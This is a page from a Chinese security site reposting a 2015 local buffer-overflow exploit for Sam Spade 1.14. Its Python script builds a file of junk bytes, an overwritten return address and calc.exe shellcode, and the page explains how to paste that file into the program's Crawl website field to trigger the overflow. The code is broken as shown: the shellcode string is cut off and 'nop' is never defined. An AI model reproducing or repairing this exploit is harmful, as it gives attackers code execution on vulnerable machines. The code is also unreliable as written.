首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
Sam Spade 1.14 Buffer Overflow
来源:MandawCoder@gmail.com 作者:Coder 发布时间:2015-11-04  
# Exploit Title     : Sam Spade 1.14 - Buffer OverFlow
# Date              : 10/30/2015
# Exploit Author    : MandawCoder
# Contact           : MandawCoder@gmail.com
# Vendor Homepage   : http://samspade.org
# Software Link     : http://www.majorgeeks.com/files/details/sam_spade.html
# Version           : 1.14
# Tested on         : XP Professional SP3 En x86
# Category          : Local Exploit
# Description:
# bug is on this section == Tools -> Crawl website...
# Execute following exploit, then delete "http://" from "CRAWL all URLs below" part, then paste the content of file.txt into mentioned section.
# this section(and other sections as well) also has SEH buffer overflow ... I would really appreciated if someone Exploit it.

f = open("file.txt", "w")

Junk = "A"*503

addr = "\x53\x93\x42\x7E"

space = "AAAA"


# Shellcode:
# windows/exec - 277 bytes
# CMD=calc.exe
shellcode= ("\xba\x1c\xb4\xa5\xac\xda\xda\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"

f.write(Junk + addr + space + nop + shellcode)


print "Done"

[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·Python 3.4 / 3.5 xmlparse_seta
·Redis Remote Command Execution
·Python 3.3 - 3.5 product_setst
·Python 3.5 time_strftime() Buf
·Python 2.7 strop.replace() Met
·Python 3.5 scan_eol() Buffer O
·Python 2.7 array.fromstring Me
·Java Secure Socket Extension (
·Python 2.7 hotshot Module - pa
·OpenSSL Alternative Chains Cer
·Gold MP4 Player - .swf Local E
·Symantec pcAnywhere 12.5.0 Win
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved